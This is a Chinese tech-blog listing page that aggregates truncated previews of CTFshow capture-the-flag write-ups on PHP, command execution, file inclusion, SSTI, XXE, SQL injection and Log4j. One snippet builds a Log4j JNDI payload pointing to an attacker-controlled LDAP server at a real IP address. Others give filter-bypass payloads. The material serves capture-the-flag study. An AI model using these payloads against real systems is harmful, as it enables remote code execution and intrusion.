E-COM-NET
首页
在线工具
Layui镜像站
SUI文档
联系我们
推荐频道
Java
PHP
C++
C
C#
Python
Ruby
go语言
Scala
Servlet
Vue
MySQL
NoSQL
Redis
CSS
Oracle
SQL Server
DB2
HBase
Http
HTML5
Spring
Ajax
Jquery
JavaScript
Json
XML
NodeJs
mybatis
Hibernate
算法
设计模式
shell
数据结构
大数据
JS
消息中间件
正则表达式
Tomcat
SQL
Nginx
Shiro
Maven
Linux
CTFshow
CTFshow
--web--红包题第二弹
查看源代码,按注释提示,构造参数试试?cmd=aactf.show_红包题ctf.show_红包题whereistheflag?源码中过滤了很多东西,可以使用的字符:p`?/+=`.+/??p/p?p??????`;HTTP/1.1Host:4947507e-e5ac-452c-8f01-80f5309742d9.challenge.ctf.showUser-Agent:Mozilla/5.0
LZ_KaiHuang
·
2023-08-22 12:25
前端
html
php
安全
ctfshow
-Log4j复现-log4j复现
1、买VPS,打开mobax进行ssh连接,开两个终端一个终端开启监听另一个终端进入JNDIExploit-1.2-SNAPSHOT.jar所在的目录jndiexploit执行下面命令java-jarJNDIExploit-1.2-SNAPSHOT.jar-i116.62.152.84生成payload构造payload${jndi:ldap://116.62.152.84:1389/Basic/
Wrypot
·
2023-08-22 07:08
Web漏洞
log4j
ctfshow
web入门 php特性web98-102
1.web98get会被post方式覆盖,传入的参数需要等于flag,才能读取到flag值,如果直接传http_flag=flag,返回的结果会是一个空数组,因为get变量被覆盖了,而post没有传参payload:get1=1postHTTP_FLAG=flag2.web99array_push在数组末尾添加内容rand(min,max)返回一个在min和max区间的随机数字file_put_c
mushangqiujin
·
2023-08-21 08:48
ctfshow通关
php
前端
开发语言
网络安全
ctfshow
文件包含web87-117
1.web87绕过死亡待可以使用rot13编码,还可以用base64编码,url两次编码,浏览器自动进行解码一次,代码解码一次,如果之编码一次,代码会被浏览器解码一次,这时候特殊字符还是url编码,而如php字符串则被还原,然后就被过滤了payload:1.rot13绕过#下放url编码为php://filter/write=string.rot13/resource=6.php的两次url编码f
mushangqiujin
·
2023-08-21 08:18
ctfshow通关
php
开发语言
网络安全
ctfshow
web入门 php特性 web93-97
1.web93intval($num,0),0代表根据变量类型进行使用哪一种进制进行取整可以使用8进制,正负数,小数点payload:010574+4476.04476.02.web94过滤了0,不能使用8进制了,还可以使用小数点,正负数等payload:4476.0+4476.0%20010574intval绕过方法:intval('4476.0')===4476小数点intval('+4476
mushangqiujin
·
2023-08-21 08:18
ctfshow通关
php
数学建模
开发语言
网络安全
Ctfshow
web入门 命令执行RCE篇 web29-web77 与 web118-web124 详细题解 持续更新中
Ctfshow
命令执行web29pregmatch是正则匹配函数,匹配是否包含flag,if(!
Jay 17
·
2023-08-20 09:49
CTFSHOW
web入门
wp合集
前端
网络安全
web安全
PHP
命令执行
RCE
安全
Ctfshow
web入门 权限维持篇 web670-web679 详细题解 全
CTFshow
权限维持web670【】补充一下PHP中单双引号的区别:单引号和双引号之间最显着的区别在于我们插入字符串和变量时。单引号不插入字符串和变量。**单引号内的内容会按原样打印出来。
Jay 17
·
2023-08-20 09:17
CTFSHOW
web入门
wp合集
web安全
网络安全
PHP
权限维持
不死马
命令执行
安全
【
CTFshow
】——PWN签到题
文章目录一【题目环境】二【题目类别】三【题目编号】四【题目描述】五【解题思路】六【解题过程】七【提交结果】一【题目环境】名称版本Ubuntu系统22.04.1LTSLinux内核5.15.0-43-generic二【题目类别】此题无特殊类别,为入门题三【题目编号】PWN签到题四【题目描述】五【解题思路】根据题目描述,我们直接使用nc(nc是netcat的缩写,它是一个网络工具,用于在网络上进行数据
IronmanJay
·
2023-08-18 04:44
PWN
PWN
CTF
CTFshow
漏洞分析
PWN签到题
Jay17 2023.8.14日报 即 留校集训阶段性总结
二是刷靶场,一个半月以来基本上都在
CTFshow
(目前300+)、NSS目前(130+)和课程靶场这三个靶场刷题,同时也把sqli-labs从头到尾刷了一遍;集训总做题量在250题上下
Jay 17
·
2023-08-15 20:17
日报专栏
安全
web安全
网络安全
CTFshow
限时活动 红包挑战7、红包挑战8
CTFshow
红包挑战7写不出来一点,还是等了官方wp之后才复现。直接给了源码可以发现,报错已经写入自定义的报错日志,同时,报错代码被自动执行了。此外,官方wp还给了一种造成报错的方法:/?
Jay 17
·
2023-08-15 05:14
CTF-web(零散wp合集)
android
web安全
网络安全
PHP
Jay17 2023.8.12日报
8.12今天做了2题,
CTFshow
红包挑战8(PHPcreate_function())和BUU[RoarCTF2019]EasyJava(web.xml泄露)。
Jay 17
·
2023-08-15 05:11
日报专栏
网络安全
web安全
CTFSHOW
php命令执行
目录web29过滤flagweb30过滤systemphpweb31过滤cat|sort|shell|\.这里有一个新姿势可以学习一下web32过滤;``''.web33web34web35web36web37data伪协议web38短开表达式web39web40__FILE__命令的扩展web41web42重定向web43web44web45web46web47web48web49web50we
双层小牛堡
·
2023-08-12 17:56
WEB
php
前端
javascript
CTFSHOW
文件包含
目录web78php://filterweb79data://text/plainweb80日志文件包含web81web82-86session文件包含web87死亡代码绕过rot13base64rot13base64web88web78php://filter/?file=/var/log/nginx/access.log&1=system('ls/var/www/html');/?file=/
双层小牛堡
·
2023-08-12 17:56
android
绕过 open_basedir
0x04利用glob://绕过方式1——DirectoryIterator+glob://方式2——opendir()+readdir()+glob://0x05通过ini_set和chdir来绕过在
ctfshow
72
双层小牛堡
·
2023-08-12 17:26
WEB
php
Ctfshow
web入门 SSTI 模板注入篇 web361-web372 详细题解 全
CTFshowSSTIweb361笔记分享一、代码块变量块{{}}用于将表达式打印到模板输出注释块{##}注释控制块{%%}可以声明变量,也可以执行语句{%foriin''.__class__.__mro__[1].__subclasses__()%}{%ifi.__name__=='_wrap_close'%}{%printi.__init__.__globals__['popen']('ls'
Jay 17
·
2023-08-11 01:11
CTFSHOW
web入门
wp合集
前端
web安全
网络安全
SSTI
jinja2
python
Ctfshow
web入门 XXE 模板注入篇 web373-web378 详细题解 全
CTFshowXXEweb373学习资料:(梭哈~)https://www.cnblogs.com/20175211lyz/p/11413335.htmlhttps://www.cnblogs.com/zhaijiahui/p/9147595.htmlhttps://www.cnblogs.com/r00tuser/p/7255939.htmlhttps://mp.weixin.qq.com/s?
Jay 17
·
2023-08-11 01:10
CTFSHOW
web入门
wp合集
web安全
网络安全
代码复审
PHP
XXE
xml
ctfshow
web93-98
web93打开环境是一个代码审计题目简单分析就是输入一个变量num,其值不能等于4476与包含字母,但是他的值需要为4476函数intval作用为获取变量的整数值,第二个参数的意思是进制,默认为10进制。题目参数为0,就根据变量类型进行判别但是只能识别10,16,8三种类型由于题目过滤了10进制的4476与16进制的x,我们可以用八进制进行绕过即010574(0为标识符)?num=010574得到
lemofox
·
2023-08-09 18:31
网络安全
CTFSHOW
WEB 1-100
web入门给她1参考文档https://blog.csdn.net/weixin_51412071/article/details/124270277查看链接sql注入直接用这里的payload也可以,但是要构造万能密码,把and换为or就行%1$'and1=1#?name=admin&pass=%1$'or1=1--+找到此页面的cookie转为16进制解码得到flag.txt尝试将Cookie
只会复制粘贴的
·
2023-08-08 05:07
网络安全
php
web安全
ctfshow
web入门 sqli-labs(持续更新)
文章目录web517-1web518-2web519-3web520-4web521-5web522-6web523-7web524-8web525-9web526-10web527-11web528-12web529-13web530-14web531-15web532-16web533-17web534-18web535-19web536-20web537-21web538-22web539-
Lum1n0us
·
2023-08-08 05:37
CTF
mysql
web
CTFShow
web1-7——CTF秀WEB模块解题思路
CTFShowWEB模块详细通关教程,受篇幅所限,通关教程分为上下两部分,第一部分为1-7关,第二部分为8-14关,本篇博客为1-7关的通关教程,从解题思路和原理剖析两个方面进行讲解CTFShowweb1-7关详细教程解题思路CTFShowweb签到题CTFShowweb2CTFShowweb3CTFShowweb4CTFShowweb5CTFShowweb6CTFShowweb7原理剖析php:
士别三日wyx
·
2023-08-08 05:06
通关教程
数据库
安全
网络安全
安全漏洞
信息安全
ctfshow
-WEB-web14( 利用数据库读写功能读取网站敏感文件)
ctf.showWEB模块第14关是一个SQL注入漏洞,绕过switch循环后可以拿到一个登录界面,登录界面存在SQL注入,脱库以后会提示flag在另一个文件中,利用数据库的文件读写功能读取文件内容即可拿到flag开局是一个switch循环,需要传递参数c,参数对应的执行结果有四种:'$url','@A@',$url,"$url";前两个是字符串,没啥用,作者的目的应该是想让我们输出后两个$url
士别三日wyx
·
2023-08-08 05:36
通关教程
网络安全
渗透测试
ctfshow
-WEB-web12( 利用代码执行漏洞读取敏感文件)
ctf.showWEB模块第12关是一个代码执行漏洞,flag藏在根目录下的一个文件中,读取文件内容接口过关进入页面后,只有一句话whereistheflag?按照以往的经验,线索肯定就藏在前端页面的源代码中右键检查或者按F12,进入开发者模式,或者直接右键查看网页源代码,源码的注释中提示了cmd,是在暗示我们利用代码执行漏洞传入cmd参数,验证一下代码执行漏洞?cmd=phpinfo();成功显
士别三日wyx
·
2023-08-08 05:35
通关教程
网络安全
渗透测试
ctfshow
-WEB-web5
ctf.showWEB模块第5关需要传递两个参数,一个字符串,一个数字,并且两个参数的md5值必须相同,我们可以利用md5的0e漏洞进行绕过0e绕过是指:0e开头的字符串在参与弱类型比较时,会被当做科学计数法,结果转换为0;我们只要传入两个md5值是以0e开头的参数,即可绕过md5加密,夺取flag页面中展示了部分源码,从源码中我们可以得知,想要夺旗需要通过GET请求传递两个参数v1和v2,并且参
士别三日wyx
·
2023-08-08 05:05
通关教程
网络安全
渗透测试
ctfshow
-WEB-web6
ctf.showWEB模块第6关是一个SQL注入漏洞,注入点是单引号字符型注入,并且过滤了空格,我们可以使用括号()或者注释/**/绕过先来一个万能账号,注意使用括号()替换空格,用户名输入以下payload,密码随便输a'or(true)#成功登录既然是SQL注入漏洞,那么flag肯定就藏在当前使用的数据库中,我们使用联合注入获取当前使用的数据库,用户名输入以下payload,密码随便输a'or
士别三日wyx
·
2023-08-08 05:05
通关教程
网络安全
渗透测试
ctfshow
-WEB-web7
ctf.showWEB模块第7关是一个SQL注入漏洞,注入点是数值型注入,源码中过滤了空格,我们可以使用括号()或者注释/**/来代替空格页面中有一个文章列表,随便点一个从url地址栏中可以看到,页面通过文章的id值来查询文章内容,我们可以考虑SQL注入漏洞首先判断注入点,输入以下payload,使SQL恒成立1/**/and/**/1可以看到,页面正常显示在输入以下payload,使SQL恒不成
士别三日wyx
·
2023-08-08 05:05
通关教程
网络安全
渗透测试
ctfshow
-WEB-web3
ctf.showWEB模块的第3关是一个文件包含漏洞,include()函数包含的文件会被执行,我们使用PHP伪协议配合抓包工具进行命令执行,从而获取flag这一关的flag就存放在网站跟路径下的文件中php://input可以访问请求的原始数据,配合文件包含漏洞可以将post请求体中的内容当做文件内容执行,enctype=multipart/form-data"时,php:/input将会无效页
士别三日wyx
·
2023-08-08 05:05
通关教程
网络安全
渗透测试
ctfshow
学习记录-web入门(文件上传161-170)
目录web161web162-163web164web165web166web167web168web169-170web161解答:这道题出的挺拐。。前端限制png,可以删除绕过。抓包上传测试了好多次,上传内容删了不成功,加上png文件头不成功,都是提示文件类型不合规。(返回的信息,可以用控制台看一下。)上传常规图片也不成功,后端判断可能不合常规。改个gif的文件头试试(GIF89a),也是一个
九枕
·
2023-08-08 05:04
ctf-web
#
ctfshow-web
前端
学习
php
文件包含&
CTFshow
78-117关
文件包含#知识点:解释-什么是文件包含定义:引用文件(包含代码),包含意味着执行,不管文件是什么类型2、分类-本地LFI(location)&远程RFI1、本地包含LFI&远程包含RFI-区别一个只能包含本地一个可以远程加载观看配置文件php_iniallow_url_fopen:ON具体形成原因由代码和环境配置文件决定3、利用-配合上传&日志&会话1.配合文件上传进行getshell,图片带有脚
大飞先生
·
2023-08-08 05:33
基础的渗透测试
php
apache
服务器
CTFshow
web93-104关
这周要学习的是php代码审计根据师兄的作业来做web入门的93-104关93关看代码进行分析他的主函数include("flag.php");highlight_file(__FILE__);if(isset($_GET['num'])){$num=$_GET['num'];if($num==4476){die("nonono!");}if(preg_match("/[a-z]/i",$num))
呕...
·
2023-08-08 05:03
android
ctfshow
web入门-sql注入
ctfshowweb入门-sql注入web171web172web173web174web175web176web177web178web179web180web181web182web183web184web185web186web187web188web189web190web191web192web193web194web195web195web197web198web199web200we
H3rmesk1t
·
2023-08-08 05:03
#
ctfshow-web
sql
ctfshow
sqlmap
SQL注入漏洞
ctfshow
-web6
0x00前言CTF加解密合集CTFWeb合集0x01题目0x02WriteUp看到是一个登录框,所以先考虑到是sql注入。使用通用payload进行测试username=a'or1=1#&password=a发现这里出现了sqlinjecterror然后测试看是哪一个字符触发了,测试后发现是空格会触发这个问题那么我们可以选择使用/**/代替空格然后就是正常流程username=a'/**/unio
Wcbddd
·
2023-08-07 18:33
CTF
web
web安全
NodeJS原型链污染&
ctfshow
_nodejs
文章目录NodeJS原型链污染&
ctfshow
_nodejs前言0x01.原型与原型链0x02.prototype和`__proto__`分别是什么?
Leekos
·
2023-08-06 08:58
CTF
原型模式
javascript
开发语言
web安全
安全
ctfshow
-web入门-node.js
=='
CTFSHOW
'&&item.username===name.toUpperCase()&&item.password=
whisper921
·
2023-08-05 23:40
web安全
安全
基于
CTFShow
-web5的MD5绕过漏洞问题
CTFhow—web51、代码审计部分2、题目思路md5加密漏洞(这里考虑0e绕过)md5漏洞介绍:PHP在处理哈希字符串时,它把每一个以“0E”开头的哈希值都解释为0所以只要v1与v2的md5值以0E开头即可。这样最后php解析到的v1和v2的md5值就都是0了payload:?v1=QNKCDZO&v2=240610708这里附上常见的0E开头的MD50e开头的md5和原值:QNKCDZO0e
Cyber Striver
·
2023-08-05 23:10
CTF-WEB
php
安全
开发语言
ctfshow
-web9
如题又是登录框,这次尝试了前面几题方法都没方法做出来,只好换一种思路,先对这网站的后台进行扫描(这里使用了很多种扫描工具比如dirb、dirbbuster都太拉了,扫了个寂寞,最后还是使用了下面这个工具扫出来的)dirsearch扫描网站目录:dirsearch-uhttp://079eb967-1867-4064-85b7-ee3490881e14.challenge.ctf.show/扫描时间
_AaRong_
·
2023-08-05 23:09
CTF
安全
flag
sql
web安全
数据库
ctfshow
-web8
如图跟上题一样都是sql注入类型的题目:根据上题过滤空格的经验,这一题也是一样过滤了空格,并且and、和unionselect都过滤了,那么只能考虑运用其他方法来注入了:过滤空格:可以使用/**/和%a0绕过过滤联合查询语句:可以使用盲注替代联合注入过滤逗号,:可以使用特殊语法绕过,比如:substr(database(),1,1)可以用substr(database()from1for1)来代替
_AaRong_
·
2023-08-05 23:09
CTF
安全
flag
sql
ctfshow
-WEB-web9( MD5加密漏洞绕过)
ctf.showWEB模块第9关是一个SQL注入漏洞,SQL中使用MD5进行加密,推荐使用MD5加密漏洞绕过进去以后就是一个登录界面,盲猜是个SQL注入漏洞首先,我们访问根目录下的robots.txt文件robots.txt是一个文本文件,同时也是一个协议,规定了爬虫访问的规则(哪些文件可以爬取,哪些文件不可以爬取)从robots.txt文件的内容中可以发现,作者给了提示,index.phps文件
士别三日wyx
·
2023-08-05 23:39
通关教程
sql
数据库
mysql
网络安全
渗透测试
ctfshow
-WEB-web10( with rollup注入绕过)
ctf.showWEB模块第10关是一个SQL注入漏洞,点击取消按钮可以获取源码,审计代码可以发现源码中存在漏洞,推荐使用withrollup注入进行绕过,此关卡过滤了空格,and等关键字1.过滤空格,可以使用括号()或者注释/**/绕过2.过滤and,可以使用or来代替进来以后是一个登录界面,盲猜是SQL注入漏洞点击取消按钮可以获取这一关的源码,下载到本地即可源码中先根据用户名查询用户信息,用户
士别三日wyx
·
2023-08-05 23:39
通关教程
sql
网络安全
渗透测试
ctfshow
-WEB AK赛-web2_观星
第一眼这个题目,跟前几天做过的很像点一个文章发现地址栏上有个id参数,应该是注入了令id=1’返回enheng?发现’被过滤了,fuzz测试过滤了空格、’、"、=、like、ascii、union、orderby、|、sleep、。常用的盲注payload为payload=1^if(ascii(substr('flag',1,1))=104,1,0)过滤了空格可以用括号代替;过滤了单引号可以用16
sec0nd_
·
2023-08-05 23:39
web笔记
安全笔记
web安全
安全
ctf
web
信息安全
ctfshow
-WEB-web8
ctf.showWEB模块第8关是一个SQL注入漏洞,注入点是数值型,注入类型推荐使用布尔盲注,此关卡过滤了空格,逗号,and,union等关键字,1.过滤空格,可以使用括号()或者注释/**/绕过2.过滤and,可以使用or替代3.过滤union,可以用盲注替代联合注入4.过滤逗号,可以使用特殊语法绕过,比如:substr(database(),1,1)可以用substr(database()f
士别三日wyx
·
2023-08-05 23:38
通关教程
网络安全
渗透测试
CTFSHOW
-WEB详解
CTFSHOW
-WEB详解一、WEB13--文件上传二、WEB-红包题第二弹一、WEB13–文件上传 开始的界面就是文件上传,确定方向为文件上传漏洞分析,尝试上传文件,我上传的第一个文件是一个文本文件很小只有
小蓝同学`
·
2023-08-05 23:08
信息安全漏洞
CTFSHOW
WEB
web漏洞
ctfshow
-WEB-web2
ctf.showWEB模块第2关是一个SQL注入漏洞,请求方式是POST请求,注入点是单引号字符型注入,flag就藏在当前的数据库的flag表中,使用联合注入获取数据即可在用户名的输入框中输入万能账号a'ortrue#,密码随便输登录成功,万能账号生效了,并且把查询到的用户名显示到了页面中,既然有显示位,那我们就用联合注入进行脱库首先,测试一下回显的位置,在用户名的输入框中输入一下payload,
士别三日wyx
·
2023-08-05 23:08
通关教程
网络安全
渗透测试
ctfshow
-WEB-web4
ctf.showWEB模块第4关是一个文件包含漏洞,页面提示了源码中的关键代码,使用include()函数接收url参数,include()函数包含的文件会被执行,从而造成任意代码执行,或者配合伪协议获取敏感文件甚至getshell;然而这一关伪协议不起作用,我们可以通过日志注入进行任意命令执行,从而getshell页面最明显的位置展示了源码的核心,提示我们利用文件包含漏洞包含日志文件,查看日志文
士别三日wyx
·
2023-08-05 23:08
通关教程
网络安全
渗透测试
ctfshow
-web
目录web签到题web2web3web4web5web6web7web8web9错误做法正确做法web10web11web12web13web14web签到题直接f12查看到了一串编码,然后直接base64解码,得到flagweb2直接用万能密码登录成功,查询得到,回显的地方为第二个字段然后开始爆表名1'unionselect1,group_concat(table_name),3frominfo
parkour-
·
2023-08-05 23:38
html5
java
web安全
ctfshow
-web入门-爆破wp
前置软件最好是用火狐浏览器,FoxyProxy插件,burpsuite,
ctfshow
给的字典附件如何配置的问题去别的博客搜,都有。
E1gHt_1
·
2023-08-05 23:38
php
网络安全
web安全
ctfshow
-web100(php特性)
运算符优先级:&&>||>=>and>oris_numeric()函数用于检测变量是否为数字或数字字符串。是数字和数字字符串则返回TRUE,否则返回FALSEvar_dump()函数可以输出多个值。$v0=is_numeric($v1)andis_numeric($v2)andis_numeric($v3);关键看这一句&&>||>=>and>or=的运算符比and高对于v0的值只需要看v1就可以
m0_62094846
·
2023-08-05 23:38
php代码
php
开发语言
后端
ctfshow
-web4
0x00前言CTF加解密合集CTFWeb合集0x01题目0x02WriteUp和web3是相同的内容,这里可以通过任意文件读取的方式来进行利用,这里根据返回包知道是nginx:默认nginx日志是:/var/log/nginx/access.log,可以看到记录了请求那么我们就可以修改ua头进行代码注入,如果存在ssh连接的话,用ssh日志也可以。首先获取当前目录然后遍历一下文件夹:然后cat一下
Wcbddd
·
2023-08-05 23:37
web
CTF
web安全
ctfshow
-web3
0x00前言CTF加解密合集CTFWeb合集0x01题目0x02WriteUp这个题目一看就知道是一个文件包含漏洞php://input可以访问请求的原始数据的只读流,将post请求的数据当作php代码执行。GEThttp://3afc5257-7b7d-4917-a1eb-5ea59fc35d8c.challenge.ctf.show/?url=php://inputHTTP/1.1Host:3
Wcbddd
·
2023-08-05 23:07
web
CTF
python
web安全
ctfshow
-web5
0x00前言CTF加解密合集CTFWeb合集0x01题目0x02WriteUp首先看到代码,发现要求v1必须是字符串,v2必须是数字,并且对v1和v2的md5弱相等,也就是==,只比较字符串开头是否相等,那么就需要找到两个md5开头相等的即可。那么QNKCDZO的md5是0e830400451993494058024219903391240610708的md5是0e4620974319065090
Wcbddd
·
2023-08-05 23:36
web
CTF
安全
CTFSHOW
re2
勒索病毒.exe打开IDA_main函数里的返回值main_0:__CheckForDebuggerJustMyCode(&unk_40B027);Str=0;memset(v19,0,sizeof(v19));Str1=0;memset(v17,0,sizeof(v17));memset(v15,0,0x100u);memset(v14,0,0x100u);v11=1;do{sub_401037
XFox_
·
2023-08-04 14:57
CTFSHOW
python
上一页
4
5
6
7
8
9
10
11
下一页
按字母分类:
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
其他